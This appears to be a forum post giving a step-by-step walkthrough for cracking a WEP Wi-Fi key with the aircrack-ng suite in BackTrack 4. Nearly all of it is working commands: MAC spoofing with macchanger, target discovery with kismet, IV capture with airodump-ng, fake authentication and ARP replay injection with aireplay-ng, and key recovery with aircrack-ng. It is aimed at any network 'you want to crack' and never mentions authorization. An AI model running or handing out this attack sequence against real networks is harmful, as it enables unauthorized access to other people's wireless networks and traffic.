Cracking WEP
I've looked at several different methods for cracking WEP... this is what worked for me:
Because my onboard wireless NIC does not support packet injection I used my wireless USB adapter to do this in BackTrack 4.
Setup your adapter:
Code:
airmon-ng stop wlan0 ifconfig wlan0 down macchanger --mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0
Start up Kismet from the command line and start collecting information (look for the WEP network you want to crack and record the channel, BSSID, and ESSID):
Code:
kismet
Open a new terminal session. Plug the values you collected from kismet into the command below (you may want to create and browse to a temporary directory because this will create several files that will dumped into the present working directory):
Code:
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0 --ivs
Next you'll want to create another terminal session and begin authentication with the router:
Code:
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
At this point open another terminal and begin packet injection (this should bump up your packet collection significantly):
Code:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
The final step to the crack is simple. Point aircrack-ng to the .ivs file that airodump-ng created. It will process until there are enough packets collected and then give you the WEP key.
Code:
aircrack-ng -s /wep_router.ivs
This should do it... I'll tweak this as go to make it better. Feel free to give feedback if you have suggestions or changes.